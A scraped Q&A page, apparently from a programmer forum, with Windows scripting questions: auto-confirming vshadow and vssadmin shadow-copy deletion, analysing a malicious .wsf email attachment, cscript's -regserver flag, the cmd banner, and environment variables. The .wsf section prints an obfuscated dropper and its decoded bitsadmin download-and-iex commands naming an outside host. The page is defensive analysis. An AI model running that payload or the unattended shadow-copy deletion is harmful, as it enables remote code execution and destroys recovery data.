I am new to programming and need some help. I need to write a PowerShell script, and as part of it it needs to run an external executable. However, I am having issues with the script not asking for an argument, and even if I pass one it just seems to wait without asking anything. So here is the part in question:
#Part of my script
$app = "D:\project1\files\vshadow.exe"
$arg1 = "-da"
$arg2 = "Y"
# the original line read "$arg2v", an undefined variable, so only -da was ever passed
& $app $arg1 $arg2
+++++++++++++++++++++++++++++++++++++
This is what I get in the console
PS D:\project1\files> C:\Users\Administrator\Desktop\test.ps1
VSHADOW.EXE 3.0 - Volume Shadow Copy sample client.
Copyright (C) 2005 Microsoft Corporation. All rights reserved.
(Option: Delete all shadow copies)
+++++++++++++++++++++++++++++
So the .exe clears volume shadow copies with a -da flag (clear all); however, the step requires a Y to continue. This is what I get when I run it from cmd.exe:
D:\project1\files>vshadow.exe -da
VSHADOW.EXE 3.0 - Volume Shadow Copy sample client.
Copyright (C) 2005 Microsoft Corporation. All rights reserved.
(Option: Delete all shadow copies)
This will delete all shadow copies in the system. Are you sure? [Y/N]
++++++++++++++++++++++++++++++
any help would be appreciated
Thanks,
Tom
Its documentation says -da requires confirmation but does not provide a way to override it. You might be able to pipe in the user input. Try this:
echo 'y' | cmd.exe /c vshadow.exe -da
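The same idea done from PowerShell itself, as an added example that is not part of the original thread: instead of going through cmd.exe, start the program with its standard input redirected and write the answer to it. The executable path and the -da argument are the asker's; the function name Invoke-WithStdin is an assumption.

```powershell
# Added example (not from the original thread): answer a console program's
# [Y/N] prompt from PowerShell by redirecting its standard input.
# The function name is an assumption; the path and argument are the asker's.

function Invoke-WithStdin {
    param(
        [Parameter(Mandatory)][string]$FilePath,
        [string[]]$ArgumentList = @(),
        [string]$StdinText = ''
    )
    $psi = New-Object System.Diagnostics.ProcessStartInfo
    $psi.FileName               = $FilePath
    $psi.Arguments              = ($ArgumentList -join ' ')
    $psi.UseShellExecute        = $false   # required for any redirection
    $psi.RedirectStandardInput  = $true
    $psi.RedirectStandardOutput = $true

    $proc = [System.Diagnostics.Process]::Start($psi)
    # Write the answer, then close stdin so the child sees end-of-input even if
    # it tries to read more than one line (otherwise it would wait forever).
    $proc.StandardInput.WriteLine($StdinText)
    $proc.StandardInput.Close()
    $stdout = $proc.StandardOutput.ReadToEnd()
    $proc.WaitForExit()

    [pscustomobject]@{
        ExitCode = $proc.ExitCode
        StdOut   = $stdout
    }
}

$app    = 'D:\project1\files\vshadow.exe'
$result = Invoke-WithStdin -FilePath $app -ArgumentList '-da' -StdinText 'Y'
$result.StdOut
"exit code: $($result.ExitCode)"
```

For a one-off, the pipeline form `'Y' | & $app '-da'` does the same redirection with less ceremony. Either way only works for programs that read their confirmation from standard input; a tool that reads the console device directly ignores redirected input, which is what the vssadmin session further down this page shows (`echo y |` still produced `[N]? N`).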
I do not know of PowerShell being able to act like an Expect script.
That said, you may be able to get around the user input requirement of the -da option. Use a vshadow query to get all copies, then pipe to a foreach loop to do a vshadow delete (-ds).
Related
I tried to delete the VSS shadow copies via cmd and it asks for a Y/N prompt. How do I automatically answer yes?
This is the syntax:
echo y | vssadmin delete shadows /all > C:\Temp\VssDeleteDriveC.log
This is the result of the syntax entered:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.
Do you really want to delete 1 shadow copies (Y/N): [N]? N
This morning I received a mail containing, among other things, a file with the extension .wsf, which I inadvertently clicked.
I immediately realized that I had made a mistake ... but too late :(
Can you tell me if it is malicious code?
Here is the code:
<package><job id="zXGYF_83"><script language="VBScript">
' Version: 10.7.91
'
' Copyright (c) Microsoft Corporation. All rights reserved.
'
' Windows Software Licensing Management Tool.
'
Set ISUaUv=WScript.CreateObject("WScript.Shell")
jpHg="&&wp|2vixrm`)exehtte)$wp|2vixrm3^694Q;4W4;WWPHJH3veqs3qsg2oveqlxm{qm33>wtxxl$GVwvpMHv$vijwrevx3$$rmqhewxmf*&&$g1$ppilwvi{stdev$$|im€$Qp($?krmvxW1xyS$€wp|2vixrm`)exehtte)$gkAQp($*$$g1$$ppilwvi{st"
arr=split(jpHg,"dev")
For Each nEZVNX In arr
KcSOUa=""
fInEJ=Len(nEZVNX) - 1
For intI = 0 to fInEJ
KcSOUa=chr(Asc(Mid(nEZVNX,intI + 1 ,1 ))+0-4)+KcSOUa
Next
ISUaUv.run KcSOUa,false,-1
Next
</script></job></package>
Thank you!
The fact that it obfuscates itself is a good indicator that it may be malicious. If you want to see what it's attempting to run, you can:
Comment out this line (like below):
'ISUaUv.run KcSOUa,false,-1
Add this line below it:
WScript.Echo KcSOUa
When you run the script you will get this output:
powershell -c ""&bitsadmin /transfer rDIlrsRC https://imwithmark.com/omar/DFDLSS70S07M052Z/inter.xls %appdata%\inter.xls""
powershell -c & $lM=gc %appdata%\inter.xls| Out-String; $lM |iex
Judging by the first line, the script is using the BITSAdmin service (built into Windows) to initiate a download from the remote URL into a local XLS file stored inside your user profile AppData folder. As for the second, I'm not clear on what that does but someone with more PowerShell knowledge will be able to shed light on it.
Update
It looks to be using gc (Get-Content applet in PowerShell) to pull the content of the file into a string using the Out-String command. It then pipes this to iex (Invoke-Expression command) to be executed.
The likelihood is the inter.xls file that was downloaded contains malicious commands that are then being locally executed in the context of the local system. This is a classic script kiddie hack to get around remote code execution.
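The answer's approach still runs the dropper's own file under the script host. A safer way to get the same result is to reimplement the decoding loop in a separate script that never calls WScript.Shell.Run, as in this added example (not code from the original question or answer). It copies the obfuscated string from the question, replays the split-on-"dev", shift-by-4, reverse logic, and prints the two command lines the answer shows; the function name is an assumption.

```powershell
# Added example (not from the original post): static decode of the .wsf
# payload string, reproducing the VBScript loop without executing anything.

# The obfuscated string copied from the question. Single quotes stop
# PowerShell from expanding the '$' characters inside it.
$encoded = '&&wp|2vixrm`)exehtte)$wp|2vixrm3^694Q;4W4;WWPHJH3veqs3qsg2oveqlxm{qm33>wtxxl$GVwvpMHv$vijwrevx3$$rmqhewxmf*&&$g1$ppilwvi{stdev$$|im€$Qp($?krmvxW1xyS$€wp|2vixrm`)exehtte)$gkAQp($*$$g1$$ppilwvi{st'

function ConvertFrom-WsfPayload {
    param(
        [Parameter(Mandatory)][string]$Blob,
        [string]$Separator = 'dev',   # the token the script splits on
        [int]$Shift = 4               # the "+0-4" applied to every character
    )
    # VBScript's Asc() returns the ANSI (Windows-1252) code of a character,
    # not the Unicode code point. That matters here: the '€' in the blob is
    # byte 0x80 in cp1252, which decodes to '|' (0x7C).
    $cp1252 = [System.Text.Encoding]::GetEncoding(1252)

    foreach ($chunk in $Blob -split [regex]::Escape($Separator)) {
        # Subtract the shift from each byte. The script prepends each decoded
        # character, so the text comes out reversed and must be flipped back.
        $bytes   = $cp1252.GetBytes($chunk)
        $decoded = [byte[]]($bytes | ForEach-Object { $_ - $Shift })
        [array]::Reverse($decoded)
        $cp1252.GetString($decoded)
    }
}

# Print the commands the dropper would have run. Nothing here is executed.
ConvertFrom-WsfPayload -Blob $encoded | ForEach-Object { "DECODED: $_" }
```

Decoding with a Unicode code point instead of the cp1252 byte would turn the '€' into an unprintable character and hide the `| Out-String` and `|iex` pipes, so the encoding choice is the one detail worth checking when porting a VBScript Asc/Chr loop.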
I have seen mentions in other places of a -regserver argument to cscript or wscript, but can't find any info that precisely defines what this option does or really clarifies when you'd want/need to use it.
Even the built-in help does not mention it:
λ cscript /?
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.
Usage: CScript scriptname.extension [option...] [arguments...]
Options:
//B Batch mode: Suppresses script errors and prompts from displaying
//D Enable Active Debugging
//E:engine Use engine for executing script
//H:CScript Changes the default script host to CScript.exe
//H:WScript Changes the default script host to WScript.exe (default)
//I Interactive mode (default, opposite of //B)
//Job:xxxx Execute a WSF job
//Logo Display logo (default)
//Nologo Prevent logo display: No banner will be shown at execution time
//S Save current command line options for this user
//T:nn Time out in seconds: Maximum time a script is permitted to run
//X Execute script in debugger
//U Use Unicode for redirected I/O from the console
Nor does Microsoft's documentation.
Note - I gather from some of the external articles I linked to that this option can be used to recover from some bugs in Windows XP and maybe also Vista. But that doesn't actually explain what this option DOES or why it exists. I don't think Microsoft added it after the fact as a FIX, but rather people could take advantage of it to address whatever those problems were in XP/Vista.
EDIT: Just because two questions have same/similar answers does not make them duplicates. The same information can answer multiple different questions. The question referred to as a potential duplicate doesn't have anything to do with the scripting executables. The value of THIS question is that someone using those tools can actually search and find an answer. They will not readily find the other one (as I did not when extensively searching/Googling before I posted this).
These are not actually unique arguments to cscript or wscript; rather they are standard arguments in Windows to any EXE which can act as a COM server.
See this related question for more details of how they operate: https://superuser.com/questions/1164298/what-actually-happens-during-regserver-unregserver
This is at least partly documented here:
If the server is packaged in an EXE module, the application wishing to
register the server launches the EXE server with the command-line
argument /RegServer or -RegServer (case-insensitive). If the
application wishes to unregister the server, it launches the EXE with
the command-line argument /UnregServer or -UnregServer.
The self-registering EXE detects these command-line arguments and invokes the same operations as a DLL would within DllRegisterServer and DllUnregisterServer, respectively, registering its module path under LocalServer32 instead of InprocServer32 or InprocHandler32.
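To see what such a registration actually leaves behind, this added example (not code from the original answer) lists the CLSIDs whose LocalServer32 value points at wscript.exe or cscript.exe, looking in both the machine and the per-user Classes hives. It is read-only; the function name is an assumption.

```powershell
# Added example (not from the original answer): show what /RegServer writes by
# listing CLSIDs whose LocalServer32 command names a script host executable.
# Read-only; nothing is registered or changed.

function Get-ScriptHostComServers {
    param([string[]]$HostNames = @('wscript.exe', 'cscript.exe'))

    $pattern = ($HostNames | ForEach-Object { [regex]::Escape($_) }) -join '|'

    # HKCR is a merged view of HKLM\Software\Classes and HKCU\Software\Classes.
    # Look at each hive separately to learn where a registration landed; a
    # per-user entry wins over the machine-wide one for that user.
    foreach ($hive in 'HKLM:\Software\Classes\CLSID', 'HKCU:\Software\Classes\CLSID') {
        if (-not (Test-Path $hive)) { continue }
        Get-ChildItem -Path $hive -ErrorAction SilentlyContinue | ForEach-Object {
            $serverKey = Join-Path $_.PSPath 'LocalServer32'
            if (Test-Path $serverKey) {
                # The module path is stored in the key's default value.
                $cmd = (Get-ItemProperty -Path $serverKey).'(default)'
                if ($cmd -and $cmd -match $pattern) {
                    [pscustomobject]@{
                        Hive    = $hive.Split(':')[0]
                        Clsid   = $_.PSChildName
                        Command = $cmd
                    }
                }
            }
        }
    }
}

Get-ScriptHostComServers | Format-Table -AutoSize
```

Swap the default host names for any other EXE to check what its /RegServer run registered, or run the function before and after the registration and compare the two lists.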
How do I change the message that comes up automatically when I start up CMD? The one where it says:
Microsoft Windows [Version 6.0.6000]
Copyright (c) 2006 Microsoft Corporation.
How do I change that automatic message?
By editing cmd.exe. :) (That was a joke, by the way; don't really try that.) If you look at cmd.exe in a hex editor, you will see that text in it. There is no easy way that I know of to change it.
Here is an ugly hack to emulate what you are wanting. First create a .cmd file that contains the following:
cmd /k init.bat
(cmd /k tells the computer to start an instance of cmd and run the parameter and not exit)
Then create your init.bat file with the following:
@echo off
cls
echo My message goes here
Then you just run your .cmd file instead of cmd.exe and you will get a command window with just your text at the top.
If I knew why you were wanting to do this, then maybe my answer could have been more specific to your needs.
You have to reverse engineer it :) I don't remember exactly how I did it, but using a debugger, single-step until you find the place where it prints that out and edit it. I "hacked" it a bit more and it refuses to do anything, saying "do it yourself!" :)
Windows 7.
It's for my own machine, so it doesn't matter if it requires admin rights or something.
Preferably in Python or .NET, but I can learn a bit of Win32 (C/C++) programming if it's necessary.
If you want to permanently set an environment variable, you can insert the new value into the registry, e.g. with VBScript, add the path "c:\test" to the PATH variable:
Set WshShell = WScript.CreateObject("WScript.Shell")
strReg = "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\Path"
strSetting = WshShell.RegRead(strReg)
strNewSetting = strSetting & ";c:\test"   ' the original was missing the colon after the drive letter
' Path is a REG_EXPAND_SZ value; passing the type keeps existing %SystemRoot%-style entries expandable
WshShell.RegWrite strReg, strNewSetting, "REG_EXPAND_SZ"
So, if you use Python or other languages, you can do the same thing using your language's own api/modules to read and write registry
Or you could try a Windows PowerShell script; PowerShell is installed on Windows 7 by default.
Run powershell.exe:
PS C:\> [Environment]::SetEnvironmentVariable("TestVariable", "Test value.", "User")
Then, for example, from cmd.exe
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\>echo %TestVariable%
Test value.
C:\>
Or, in a new powershell.exe:
PS C:\> echo $ENV:TestVariable
Test Value.
PS C:\>
Check out http://technet.microsoft.com/en-us/library/ff730964.aspx
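A [Environment]::SetEnvironmentVariable call with the User target writes the value as a plain REG_SZ and does not tell running programs about the change. When the variable is Path, that means entries such as %USERPROFILE%\bin are stored back as literal text. This added example (not code from the original answer) appends a directory to the per-user Path while keeping the value type and then broadcasts the change; the function name and the sample directory are assumptions.

```powershell
# Added example (not from the original answer): append a directory to the
# per-user PATH permanently, preserving REG_EXPAND_SZ and notifying the
# shell. Function name and directory are assumptions.

function Add-UserPathEntry {
    param([Parameter(Mandatory)][string]$Directory)

    $key = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Environment', $true)
    try {
        # Read the raw value so entries like %USERPROFILE%\bin are not expanded
        # and then written back as literal paths.
        $raw = [string]$key.GetValue('Path', '',
            [Microsoft.Win32.RegistryValueOptions]::DoNotExpandEnvironmentNames)
        $entries = @($raw -split ';' | Where-Object { $_ -ne '' })

        if ($entries -contains $Directory) {
            return "already present: $Directory"
        }
        # Append rather than prepend: an entry placed first shadows every
        # tool of the same name later in the search order.
        $entries += $Directory
        $key.SetValue('Path', ($entries -join ';'),
            [Microsoft.Win32.RegistryValueKind]::ExpandString)
    }
    finally {
        $key.Close()
    }

    # Broadcast WM_SETTINGCHANGE so Explorer and newly opened consoles pick
    # up the change without a logoff. Already-running processes keep the copy
    # of the environment they were started with.
    if (-not ('Win32.NativeMethods' -as [type])) {
        Add-Type -Namespace Win32 -Name NativeMethods -MemberDefinition @'
[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
public static extern IntPtr SendMessageTimeout(IntPtr hWnd, uint Msg, UIntPtr wParam,
    string lParam, uint fuFlags, uint uTimeout, out UIntPtr lpdwResult);
'@
    }
    $HWND_BROADCAST   = [IntPtr]0xffff
    $WM_SETTINGCHANGE = 0x1A
    $SMTO_ABORTIFHUNG = 0x2
    $result = [UIntPtr]::Zero
    [void][Win32.NativeMethods]::SendMessageTimeout($HWND_BROADCAST, $WM_SETTINGCHANGE,
        [UIntPtr]::Zero, 'Environment', $SMTO_ABORTIFHUNG, 5000, [ref]$result)

    "added: $Directory"
}

Add-UserPathEntry -Directory 'C:\Tools\bin'   # constructed sample directory
```

Open a fresh cmd.exe or powershell.exe afterwards and `echo %PATH%` / `$env:Path` will show the new entry; the session that ran the function still has its old copy, exactly as the answer's `Test Value.` output above relied on a new shell. The machine-wide equivalent is the same code against `[Microsoft.Win32.Registry]::LocalMachine` and the `SYSTEM\CurrentControlSet\Control\Session Manager\Environment` key, which needs an elevated prompt.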
In C# the following creates a permanent environment variable:
Environment.SetEnvironmentVariable("foo", "bar", EnvironmentVariableTarget.Machine);
For anyone else looking for a quick command-line answer:
SETX is available on Windows servers (natively, I think - http://technet.microsoft.com/en-us/library/cc755104.aspx ).
It's also available in the Windows 7 and 8 toolkit.
Use the Environment class like this:
Environment.SetEnvironmentVariable("foo", "bar");
Programmatically modifying environment variables is only for the duration of the program. I have not heard of actually modifying the environment system-wide and making it effective there and then. I do not think that can be done; that would require poking around at privileged level and possibly messing with the core system to achieve that.
Even under Unix, it cannot be done despite some hacks to achieve it. I do remember seeing code that actually did modify the environment variables under MSDOS, by altering MSDOS's _psp environment data structure, but that was a single-tasking, 16-bit system with no protection whatsoever.
To sum up, I do not think you can, and it would be unwise to do so: it could be perceived as if the system is under threat by a 'trojan' or a 'virus' as a result of attempting to do so. Not only that, as a user I would not like a program to modify the system environment variables without my consent! Sure, a program can write to the registry to make it permanent, but I would still like to know what the purpose of it is and why.